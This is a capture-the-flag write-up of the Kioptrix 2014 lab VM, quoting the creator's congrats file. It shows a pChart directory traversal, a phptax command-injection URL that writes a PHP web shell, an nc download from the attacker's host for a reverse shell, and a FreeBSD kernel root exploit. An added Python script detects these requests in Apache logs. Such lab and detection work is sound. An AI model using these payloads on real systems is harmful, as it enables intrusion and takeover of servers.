[VULNHUB] Kioptrix: 2014 (#5)

This VM is the first of my OSCP series; these VMs are similar in difficulty to the OSCP ones. Let’s start!

DIRECTORY TRAVERSAL IS YOUR FRIEND

Always start with an nmap scan:

nmap 192.168.1.21 -sV

This is what I got:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-23 09:55 CET
Nmap scan report for 192.168.1.21
Host is up (0.0052s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds

There is a closed SSH service and two HTTP web servers. I did some research with nikto:

nikto -h 192.168.1.21 -p 80

The output is the same as for port 8080:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.21
+ Target Hostname:    192.168.1.21
+ Target Port:        80
+ Start Time:         2016-11-23 09:57:14 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 18:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ 8345 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2016-11-23 09:58:58 (GMT1) (104 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Wow! It seems to be vulnerable to a buffer overflow which allows remote code execution. I did some research and found the exploit, but it didn’t work because the Apache and OS versions were up to date. So I browsed to http://192.168.1.21 and there was just an “It works” string. Checking the source code of the HTML page I found a comment with a URL:

URL=pChart2.1.3/index.php

There is a pChart2.1.3 directory. I opened it and the index of the platform appeared. After some research I found these vulnerabilities. Directory traversal seems to be interesting. I browsed to http://192.168.1.21/pChart2.1.3/examples/index.php?Action=View&Script=/etc/passwd and the file was printed to my screen. I thought that this could be the attack vector. Then I browsed to http://192.168.1.21:8080 but I got Error 403: Forbidden. I returned to the previous website and checked the FreeBSD Apache configuration file: http://192.168.1.21/pChart2.1.3/examples/index.php?Action=View&Script=/usr/local/etc/apache22/httpd.conf. This is the relevant part:

Allow from env=Mozilla4_browser

That’s why I can’t access port 8080: I need a Mozilla4_browser User-Agent.

SHELL THE WEB

So I fired up Burpsuite, activated the proxy without interception and changed the User-Agent to simulate Internet Explorer. Now I can access port 8080, and I discovered that directory listing was active with only a single directory, phptax. Now I am in the PHPTAX index. Again I researched vulnerabilities and found a remote code execution. I could use the Metasploit module, but let’s try the harder way. I used this one. Netcat didn’t work, so I created a PHP shell with this:

http://192.168.1.21:8080/phptax/index.php?pfilez=xxx;echo %22%3C%3Fphp system(\$_GET['cmd']); %3F%3E%22 > shell.php&pdf=make

Now, navigating to http://192.168.1.21:8080/phptax/shell.php?cmd=ls, I can view the files. Next I used the pentestmonkey PHP reverse shell. First of all I started listening with netcat, serving the file:

nc -lvp 1234 < php_reverse_shell.php

Then I executed this in the browser:

http://192.168.1.21:8080/phptax/shell.php?cmd=nc 192.168.1.12 1234 > reverse_shell.php &

I checked the download with the ls command. Then I started listening again with netcat:

nc -lvp 1234

Then I browsed to http://192.168.1.21:8080/phptax/reverse_shell.php and got a shell in my terminal, without a TTY. I tried to escape from the limited shell but there was no way to achieve that, so I continued with the limited one.
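To see how noisy the requests above are on the server side (the congrats file later points at /var/log/httpd-access.log), here is an added example, not part of the original write-up, that flags the pChart file read, the phptax command injection and the dropped shell.php driver in Apache combined-format log lines. It assumes the default combined log format; the sample lines are constructed to mirror the requests above, not copied from the VM.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Apache "combined" format as written to FreeBSD's /var/log/httpd-access.log
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SHELL_META = re.compile(r'[;|`&]|\$\(')  # shell metacharacters, never valid in a filename

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def query_params(query):
    # Split on '&' only: the phptax injection relies on ';' surviving inside a value
    pairs = (p.partition("=") for p in query.split("&"))
    return [(unquote_plus(k), unquote_plus(v)) for k, _, v in pairs]

def classify(target):
    """Return the finding labels for one request target (path + query)."""
    findings = []
    parts = urlsplit(target)
    path = unquote(parts.path)
    for key, value in query_params(parts.query):
        # pChart 2.1.3 examples/index.php?Action=View&Script=... reads any file
        if key == "Script" and (value.startswith("/") or "../" in value):
            findings.append("pchart-traversal")
        # phptax index.php?pfilez=... reaches a shell, so metacharacters mean injection
        if key == "pfilez" and SHELL_META.search(value):
            findings.append("phptax-cmd-injection")
        # a dropped PHP one-liner is driven through ?cmd=
        if key == "cmd" and path.endswith(".php"):
            findings.append("webshell-command")
    return findings

def scan(lines):
    """Return (client ip, target, labels) for each line matching a pattern."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        labels = classify(rec["target"])
        if labels:
            hits.append((rec["ip"], rec["target"], labels))
    return hits

# Constructed sample lines (not taken from the VM), mirroring this walkthrough's requests
SAMPLE_LOG = [
    '192.168.1.12 - - [23/Nov/2016:10:01:02 +0100] "GET /pChart2.1.3/examples/index.php?Action=View&Script=/etc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '192.168.1.12 - - [23/Nov/2016:10:05:40 +0100] "GET /phptax/index.php?pfilez=xxx;echo%20%22%3C%3Fphp%20system(%24_GET%5B%27cmd%27%5D);%20%3F%3E%22%20%3E%20shell.php&pdf=make HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"',
    '192.168.1.12 - - [23/Nov/2016:10:06:10 +0100] "GET /phptax/shell.php?cmd=ls HTTP/1.1" 200 210 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"',
    '192.168.1.30 - - [23/Nov/2016:10:07:00 +0100] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.drawBarChart.php HTTP/1.1" 200 3400 "-" "Mozilla/5.0"',
]
```

Running scan() over the real access log would list every such request with the client address that sent it; the benign pChart example request in the fourth sample line produces no finding.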

YOU HAD TO UPDATE YOUR FREEBSD VERSION MATE

Now I need to escalate my privileges. I checked the kernel version:

uname -a

The output is:

FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

Ok, so I need to search for a FreeBSD 9.0 privilege escalation, and I found an interesting exploit. I downloaded the .c file locally and transferred it via netcat into the /tmp folder. Then I compiled and ran it:

gcc exploit.c -o exploit
chmod +x exploit
./exploit

Then I checked that I was root with the id command and browsed to the /root directory. I listed the files and opened congrats.txt:

If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks. 

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)